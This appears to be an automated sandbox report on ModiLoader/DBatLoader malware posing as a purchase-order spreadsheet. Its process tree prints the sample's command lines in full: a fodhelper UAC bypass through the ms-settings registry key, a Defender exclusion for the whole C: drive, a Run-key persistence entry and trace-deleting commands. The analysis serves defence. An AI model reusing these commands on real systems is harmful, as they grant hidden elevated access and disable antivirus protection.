Analysis
-
max time kernel
149s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
27-06-2024 19:10
Static task
static1
Behavioral task
behavioral1
Sample
New PO -39850-1064 -2084-GEN101 -Order,xls.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
New PO -39850-1064 -2084-GEN101 -Order,xls.exe
Resource
win10v2004-20240508-en
General
-
Target
New PO -39850-1064 -2084-GEN101 -Order,xls.exe
-
Size
1.1MB
-
MD5
b3e46d9e108107da316136965308482d
-
SHA1
e6fe35708b4fe7b16bbf41596953fe5e8ff53b2a
-
SHA256
f785cc537cb807746d44c134899d64c9133b22c958f0cb4dd7a92f5af9da413f
-
SHA512
9724d2ebe1137ac605586b13d0d0d58c8bb5e65edc22ffee162ac318db97f13e4bd6d4175721fb51c163751e4a3de23ee7456e229e499ea751ef4f827d4d9438
-
SSDEEP
12288:uSO7HrAp5/yBMHZ0tdOsUDSo4Or9p+jDngeGF6OLMyWpldQ1QHFwfmxysAkmCqff:0fC/yuHZ0tdgDSvw9p8D7Gd9xu+DTSq
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1248-79-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral1/memory/1248-81-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 -
Executes dropped EXE 20 IoCs
Processes:
inqqjayC.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exeinqqjayC.pifpid process 2356 inqqjayC.pif 2792 alpha.exe 2744 alpha.exe 2808 alpha.exe 2196 alpha.exe 2756 alpha.exe 2556 alpha.exe 2600 xkn.exe 1296 alpha.exe 1448 ger.exe 2780 alpha.exe 1604 alpha.exe 1300 alpha.exe 1508 alpha.exe 1776 alpha.exe 1244 alpha.exe 1284 alpha.exe 848 alpha.exe 1256 alpha.exe 1248 inqqjayC.pif -
Loads dropped DLL 16 IoCs
Processes:
New PO -39850-1064 -2084-GEN101 -Order,xls.execmd.exealpha.exexkn.exealpha.exepid process 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe 2740 cmd.exe 2740 cmd.exe 2740 cmd.exe 2740 cmd.exe 2740 cmd.exe 2740 cmd.exe 2556 alpha.exe 2600 xkn.exe 2600 xkn.exe 2600 xkn.exe 1296 alpha.exe 2740 cmd.exe 2740 cmd.exe 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
New PO -39850-1064 -2084-GEN101 -Order,xls.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cyajqqni = "C:\\Users\\Public\\Cyajqqni.url" New PO -39850-1064 -2084-GEN101 -Order,xls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
New PO -39850-1064 -2084-GEN101 -Order,xls.exedescription pid process target process PID 2716 set thread context of 2356 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif PID 2716 set thread context of 1248 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2704 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\ms-settings\shell ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
xkn.exeinqqjayC.pifpid process 2600 xkn.exe 1248 inqqjayC.pif 1248 inqqjayC.pif -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
xkn.exetaskkill.exeinqqjayC.pifdescription pid process Token: SeDebugPrivilege 2600 xkn.exe Token: SeDebugPrivilege 2704 taskkill.exe Token: SeDebugPrivilege 1248 inqqjayC.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
New PO -39850-1064 -2084-GEN101 -Order,xls.exeinqqjayC.pifcmd.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2716 wrote to memory of 2356 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif PID 2716 wrote to memory of 2356 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif PID 2716 wrote to memory of 2356 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif PID 2716 wrote to memory of 2356 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif PID 2716 wrote to memory of 2356 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif PID 2716 wrote to memory of 2356 2716 New PO -39850-1064 -2084-GEN101 -Order,xls.exe inqqjayC.pif PID 2356 wrote to memory of 2740 2356 inqqjayC.pif cmd.exe PID 2356 wrote to memory of 2740 2356 inqqjayC.pif cmd.exe PID 2356 wrote to memory of 2740 2356 inqqjayC.pif cmd.exe PID 2356 wrote to memory of 2740 2356 inqqjayC.pif cmd.exe PID 2740 wrote to memory of 2056 2740 cmd.exe extrac32.exe PID 2740 wrote to memory of 2056 2740 cmd.exe extrac32.exe PID 2740 wrote to memory of 2056 2740 cmd.exe extrac32.exe PID 2740 wrote to memory of 2792 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2792 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2792 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2744 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2744 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2744 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2808 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2808 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2808 2740 cmd.exe alpha.exe PID 2808 wrote to memory of 2828 2808 alpha.exe extrac32.exe PID 2808 wrote to memory of 2828 2808 alpha.exe extrac32.exe PID 2808 wrote to memory of 2828 2808 alpha.exe extrac32.exe PID 2740 wrote to memory of 2196 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2196 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2196 2740 cmd.exe alpha.exe PID 2196 wrote to memory of 2688 2196 alpha.exe extrac32.exe PID 2196 wrote to memory of 2688 2196 alpha.exe extrac32.exe PID 2196 wrote to memory of 2688 2196 alpha.exe extrac32.exe PID 2740 wrote to memory of 2756 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2756 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2756 2740 cmd.exe alpha.exe PID 2756 wrote to memory of 2540 2756 alpha.exe extrac32.exe PID 2756 wrote to memory of 2540 2756 alpha.exe extrac32.exe PID 2756 wrote to memory of 2540 2756 alpha.exe extrac32.exe PID 2740 wrote to memory of 2556 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2556 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2556 2740 cmd.exe alpha.exe PID 2556 wrote to memory of 2600 2556 alpha.exe xkn.exe PID 2556 wrote to memory of 2600 2556 alpha.exe xkn.exe PID 2556 wrote to memory of 2600 2556 alpha.exe xkn.exe PID 2600 wrote to memory of 1296 2600 xkn.exe alpha.exe PID 2600 wrote to memory of 1296 2600 xkn.exe alpha.exe PID 2600 wrote to memory of 1296 2600 xkn.exe alpha.exe PID 1296 wrote to memory of 1448 1296 alpha.exe ger.exe PID 1296 wrote to memory of 1448 1296 alpha.exe ger.exe PID 1296 wrote to memory of 1448 1296 alpha.exe ger.exe PID 2740 wrote to memory of 2780 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2780 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 2780 2740 cmd.exe alpha.exe PID 2780 wrote to memory of 2704 2780 alpha.exe taskkill.exe PID 2780 wrote to memory of 2704 2780 alpha.exe taskkill.exe PID 2780 wrote to memory of 2704 2780 alpha.exe taskkill.exe PID 2740 wrote to memory of 1604 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 1604 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 1604 2740 cmd.exe alpha.exe PID 1604 wrote to memory of 2448 1604 alpha.exe PING.EXE PID 1604 wrote to memory of 2448 1604 alpha.exe PING.EXE PID 1604 wrote to memory of 2448 1604 alpha.exe PING.EXE PID 2740 wrote to memory of 1300 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 1300 2740 cmd.exe alpha.exe PID 2740 wrote to memory of 1300 2740 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\New PO -39850-1064 -2084-GEN101 -Order,xls.exe"C:\Users\Admin\AppData\Local\Temp\New PO -39850-1064 -2084-GEN101 -Order,xls.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Libraries\inqqjayC.pifC:\Users\Public\Libraries\inqqjayC.pif2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\473D.tmp\473E.tmp\473F.bat C:\Users\Public\Libraries\inqqjayC.pif"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- Runs ping.exe
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\New PO -39850-1064 -2084-GEN101 -Order,xls.exe C:\\Users\\Public\\Libraries\\Cyajqqni.PIF2⤵
-
C:\Users\Public\Libraries\inqqjayC.pifC:\Users\Public\Libraries\inqqjayC.pif2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\473D.tmp\473E.tmp\473F.batFilesize
1KB
MD5e62f427202d3e5a3ba60ebe78567918c
SHA16ef0cd5ba6c871815fceb27ff095a7931452b334
SHA25606bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6
-
C:\Users\Public\ger.exeFilesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
\Users\Public\Libraries\inqqjayC.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
\Users\Public\alpha.exeFilesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
\Users\Public\xkn.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/1248-92-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-118-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-128-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-98-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-96-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-132-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-134-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-136-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-138-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-140-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-79-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/1248-81-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/1248-83-0x0000000034130000-0x000000003418A000-memory.dmpFilesize
360KB
-
memory/1248-84-0x0000000034190000-0x00000000341EA000-memory.dmpFilesize
360KB
-
memory/1248-85-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-100-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-88-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-90-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-94-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-104-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-130-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-112-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-86-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-102-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-106-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-110-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-108-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-124-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-126-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-122-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-120-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-114-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/1248-116-0x0000000034190000-0x00000000341E3000-memory.dmpFilesize
332KB
-
memory/2356-14-0x0000000000400000-0x000000000041A000-memory.dmpFilesize
104KB
-
memory/2356-11-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/2356-70-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/2356-72-0x0000000000400000-0x000000000041A000-memory.dmpFilesize
104KB
-
memory/2356-13-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/2600-48-0x0000000000380000-0x0000000000388000-memory.dmpFilesize
32KB
-
memory/2600-47-0x000000001B600000-0x000000001B8E2000-memory.dmpFilesize
2.9MB
-
memory/2716-0-0x0000000000220000-0x0000000000221000-memory.dmpFilesize
4KB
-
memory/2716-1-0x0000000000220000-0x0000000000221000-memory.dmpFilesize
4KB
-
memory/2716-2-0x0000000000400000-0x0000000000520000-memory.dmpFilesize
1.1MB